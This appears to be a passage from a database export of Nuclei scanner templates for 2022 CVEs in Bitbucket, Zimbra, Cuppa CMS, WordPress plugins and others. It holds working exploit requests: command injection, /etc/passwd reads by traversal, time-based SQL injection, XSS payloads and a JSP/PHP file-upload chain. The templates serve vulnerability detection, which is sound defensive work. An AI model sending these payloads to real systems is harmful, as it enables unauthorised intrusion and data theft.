{{Hostname}}\n - |\n GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\n Host: {{Hostname}}\n\n stop-at-first-match: true\n iterate-all: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"com.atlassian.bitbucket.scm.CommandFailedException\"\n\n - type: status\n status:\n - 500\n\n extractors:\n - type: json # type of the extractor\n name: key\n internal: true\n json:\n - '.[\"values\"] | .[] | .[\"project\"] | .key'\n part: body\n\n - type: json\n name: slug\n internal: true\n json:\n - '.[\"values\"] | .[] | .slug'\n part: body\n\n - type: regex\n group: 1\n regex:\n - 'uid=.*\\(([a-z]+)\\):'\n# digest: 4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950", "hash": "1679bf0af1ccbe01c82f6a82e8102b2c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856b" }, "name": "CVE-2022-36883.yaml", "content": "id: CVE-2022-36883\n\ninfo:\n name: Jenkins Git <=4.11.3 - Missing Authorization\n author: c-sh0\n severity: high\n description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.\n remediation: |\n Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883\n - https://nvd.nist.gov/vuln/detail/CVE-2022-36883\n - http://www.openwall.com/lists/oss-security/2022/07/27/1\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-36883\n cwe-id: CWE-862\n epss-score: 0.01328\n epss-percentile: 0.84605\n cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: jenkins\n product: git\n framework: jenkins\n shodan-query: X-Jenkins\n tags: cve,cve2022,jenkins,plugin,git,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"repository:\"\n - SCM API plugin\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ac3853e5c0b1575adbb7b7ed2af7b72f43f114875211dd347e0293df556a12a602201f6215244b284d054336a4750c2340219ab9d9be367383ba0b171439c19ccd56:922c64590222798bb761d5b6d8e72950", "hash": "72991814df7a5e1f9675419a7df65bd9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856c" }, "name": "CVE-2022-37042.yaml", "content": "id: CVE-2022-37042\n\ninfo:\n name: Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution\n author: _0xf4n9x_,For3stCo1d\n severity: critical\n description: |\n Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite.\n reference:\n - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/\n - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/\n - https://github.com/vnhacker1337/CVE-2022-27925-PoC\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37042\n - https://wiki.zimbra.com/wiki/Security_Center\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-37042\n cwe-id: CWE-22\n epss-score: 0.97539\n epss-percentile: 0.99994\n cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: zimbra\n product: collaboration\n shodan-query: http.favicon.hash:\"1624375939\"\n fofa-query: app=\"zimbra-邮件系统\"\n tags: cve,cve2022,zimbra,rce,unauth,kev\n\nhttp:\n - raw:\n - |\n POST {{path}} HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n content-type: application/x-www-form-urlencoded\n\n {{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n - |\n GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n path:\n - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1\n - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 401'\n - 'status_code_2 == 200'\n - \"contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')\"\n condition: and\n# digest: 490a004630440220174e125afd24ffd46b83dc8fbd16ba76bac1f9c389dcf41df028a42b438df438022062eb429750f3554a28c017e74167a82a4023aa672bf4059f0bc3e2e444886d8f:922c64590222798bb761d5b6d8e72950", "hash": "af1873b761ca064e6959ad968d03872b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856d" }, "name": "CVE-2022-37153.yaml", "content": "id: CVE-2022-37153\n\ninfo:\n name: Artica Proxy 4.30.000000 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.\n remediation: |\n Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability.\n reference:\n - https://github.com/Fjowel/CVE-2022-37153\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37153\n - https://github.com/SYRTI/POC_to_review\n - https://github.com/WhooAmii/POC_to_review\n - https://github.com/k0mi-tg/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-37153\n cwe-id: CWE-79\n epss-score: 0.0013\n epss-percentile: 0.47096\n cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: articatech\n product: artica_proxy\n shodan-query: http.html:\"Artica\"\n tags: cve,cve2022,xss,artica,articatech\n\nhttp:\n - raw:\n - |\n POST /fw.login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Password\" value=\"admin\">'\n - 'Artica Web'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950", "hash": "2fa3c745a0f49e9e369081d2162c7127", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856e" }, "name": "CVE-2022-37190.yaml", "content": "id: CVE-2022-37190\n\ninfo:\n name: Cuppa CMS v1.0 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from \"/api/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37190\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-37190\n cwe-id: CWE-732\n epss-score: 0.02018\n epss-percentile: 0.8771\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve2022,cve,rce,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Ftable_manager%2Fview%2Fcu_api_keys\n - |\n POST /api/index.php HTTP/1.1\n Host: {{Hostname}}\n key: {{apikey}}\n Content-Type: application/x-www-form-urlencoded\n\n action=system&function=exec&cmd=cat+/etc/passwd\n\n matchers-condition: and\n matchers:\n - type: word\n part: header_3\n words:\n - \"text/html\"\n\n - type: regex\n regex:\n - \"postgres:.*:1001:\"\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: apikey\n group: 1\n regex:\n - \"(.*?)\"\n internal: true\n# digest: 4a0a00473045022053679076bc7557501e02d91d43aef620a97ae250150ec9582e38ba855f404c6c022100c8428d2b76fa3b6dc76a6218b76fe10761ac009d56feb84be0cddc2a9f54cfa5:922c64590222798bb761d5b6d8e72950", "hash": "707ad86ed81205a277779c7bdc55ee41", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856f" }, "name": "CVE-2022-37191.yaml", "content": "id: CVE-2022-37191\n\ninfo:\n name: Cuppa CMS v1.0 - Authenticated Local File Inclusion\n author: theamanrawat\n severity: medium\n description: |\n The component \"cuppa/api/index.php\" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37191\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-37191\n cwe-id: CWE-829\n epss-score: 0.46328\n epss-percentile: 0.97122\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Ftable_manager%2Fview%2Fcu_api_keys\n - |\n POST /api/index.php HTTP/1.1\n Host: {{Hostname}}\n key: {{apikey}}\n Content-Type: application/x-www-form-urlencoded\n\n function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n\n matchers-condition: and\n matchers:\n - type: word\n part: header_3\n words:\n - \"text/html\"\n\n - type: regex\n part: body_3\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: apikey\n group: 1\n regex:\n - \"(.*?)\"\n internal: true\n# digest: 4b0a00483046022100904cc1a592552a2c9efd1a803e2a5a5680978eedc314a4ec299062cd14edb5a4022100fd7b972b8ba3218b82bbd8a155497cf3d8d1b67134bdc2b3579f6f06970e0aea:922c64590222798bb761d5b6d8e72950", "hash": "32f5e13f6d00c957b9b603fda5f26b35", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308570" }, "name": "CVE-2022-37299.yaml", "content": "id: CVE-2022-37299\n\ninfo:\n name: Shirne CMS 1.2.0 - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability.\n reference:\n - https://twitter.com/pikpikcu/status/1568316864690028544\n - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37299\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-37299\n cwe-id: CWE-22\n epss-score: 0.00772\n epss-percentile: 0.80878\n cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: shirne_cms_project\n product: shirne_cms\n tags: cve,cve2022,shirnecms,lfi,shirne_cms_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"cm9vd\" # root in base64\n\n - type: word\n part: header\n words:\n - \"image/png\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950", "hash": "acc71bd5a42edcb007fa4eee2b9c8a52", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308571" }, "name": "CVE-2022-3768.yaml", "content": "id: CVE-2022-3768\n\ninfo:\n name: WordPress WPSmartContracts <1.3.12 - SQL Injection\n author: Hardik-Solanki\n severity: high\n description: |\n WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 1.3.12\n reference:\n - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768\n - https://cve.report/CVE-2022-3768\n - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-3768\n cwe-id: CWE-89\n epss-score: 0.01715\n epss-percentile: 0.86512\n cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wpsmartcontracts\n product: wpsmartcontracts\n framework: wordpress\n tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n\n - |\n @timeout: 15s\n GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"Batch Mint NFTs\")'\n condition: and\n# digest: 4b0a00483046022100bd925a5d0628000976660fe729e42a7f314f002bfb6407b82e26f1b090b62a4d022100b482d42c6c8674fb3ced86981e2df21831b145496f590b50dec1531c3d60d471:922c64590222798bb761d5b6d8e72950", "hash": "1f82ef7e42528e9cbfd1b65a2d0a2814", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308572" }, "name": "CVE-2022-3800.yaml", "content": "id: CVE-2022-3800\n\ninfo:\n name: IBAX - SQL Injection\n author: JC175\n severity: high\n description: |\n IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks.\n reference:\n - https://github.com/IBAX-io/go-ibax/issues/2061\n - https://vuldb.com/?id.212636\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3800\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-3800\n cwe-id: CWE-89,CWE-707\n epss-score: 0.05291\n epss-percentile: 0.92303\n cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ibax\n product: go-ibax\n tags: cve2022,cve,ibax,go-ibax,sqli\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /api/v2/open/rowsInfo HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n order=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"usesysid\")'\n condition: and\n# digest: 490a0046304402201f15cc161ca0936b83e8f97725a8c7682727e50af295464970a0119f45333c8902202333cca77720c53959b684542fef75975bccfe288152444357d2657e50a796ab:922c64590222798bb761d5b6d8e72950", "hash": "9ec79fe9a9d584877e61c0ad832472d9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308573" }, "name": "CVE-2022-38131.yaml", "content": "id: CVE-2022-38131\n\ninfo:\n name: RStudio Connect - Open Redirect\n author: xxcdd\n severity: medium\n description: |\n RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.\n impact: |\n An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.\n remediation: |\n This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.\n reference:\n - https://tenable.com/security/research/tra-2022-30\n - https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect\n - https://github.com/JoshuaMart/JoshuaMart\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38131\n cwe-id: CWE-601\n epss-score: 0.0006\n epss-percentile: 0.23591\n cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: rstudio\n product: connect\n shodan-query: \"http.favicon.hash:217119619\"\n fofa-query: \"app=\\\"RStudio-Connect\\\"\"\n tags: tenable,cve,cve2022,redirect,rstudio\n\nhttp:\n - raw:\n - |\n GET //%5cexample.com HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$'\n\n - type: status\n status:\n - 307\n# digest: 490a0046304402200b9d41c0309ab333bc791e17f4889c4b508a20ade256857de387596a939fb4c902200510b2369cd933fdeb6f527cf54398cb913417dac88699d63249c20b88272874:922c64590222798bb761d5b6d8e72950", "hash": "d283fd2dc6ffd59fdda2ac252f95f20c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308574" }, "name": "CVE-2022-38295.yaml", "content": "id: CVE-2022-38295\n\ninfo:\n name: Cuppa CMS v1.0 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38295\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38295\n cwe-id: CWE-79\n epss-score: 0.00269\n epss-percentile: 0.64416\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve2022,cve,xss,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/classes/functions.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n id_field=0&name_field=\">&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - '\">'\n - 'cuppa_html'\n condition: and\n\n - type: word\n part: header_3\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205702724d42507ffc7d8cd044e6d6cf80b1f1c0a3064667003638e86af6920a29022100c1aa20860b9fe2846eca8e70f515a44501a69d01c6e6e2f1e78c634a549800ce:922c64590222798bb761d5b6d8e72950", "hash": "92c6e874cd8d0d2c33f0338cd6de7efc", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308575" }, "name": "CVE-2022-38296.yaml", "content": "id: CVE-2022-38296\n\ninfo:\n name: Cuppa CMS v1.0 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: |\n Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38296\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-38296\n cwe-id: CWE-434\n epss-score: 0.02351\n epss-percentile: 0.88674\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,rce,cuppa,intrusive,cuppacms\n\nhttp:\n - raw:\n - |\n POST /js/jquery_file_upload/server/php/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"path\"\n\n /\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"unique_name\"\n\n true\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"resize_width\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"resize_height\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"crop\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"compress\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\n Content-Type: image/jpeg\n\n \n ------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n - |\n POST /js/filemanager/api/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n - |\n GET /media/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - ed6bf8b1b4b8e64836455fe32b958c2c\n condition: and\n\n - type: word\n part: header_3\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: filename\n group: 1\n regex:\n - '\"name\":\"(.*?)\",'\n internal: true\n# digest: 4a0a004730450221008e6f64cbcac30a77559654a774f32ae62113b17ec9d03eef4da8a86d796f2d2d0220687c6d62f1c3abc958148a0289f7076ec9819d04b320980f98c45a7caa8288a6:922c64590222798bb761d5b6d8e72950", "hash": "6fb6026a0f7643a360e14862f8f43848", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308576" }, "name": "CVE-2022-38463.yaml", "content": "id: CVE-2022-38463\n\ninfo:\n name: ServiceNow - Cross-Site Scripting\n author: amanrawat\n severity: medium\n description: |\n ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance.\n remediation: |\n Apply the latest security patches provided by ServiceNow to mitigate this vulnerability.\n reference:\n - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793\n - 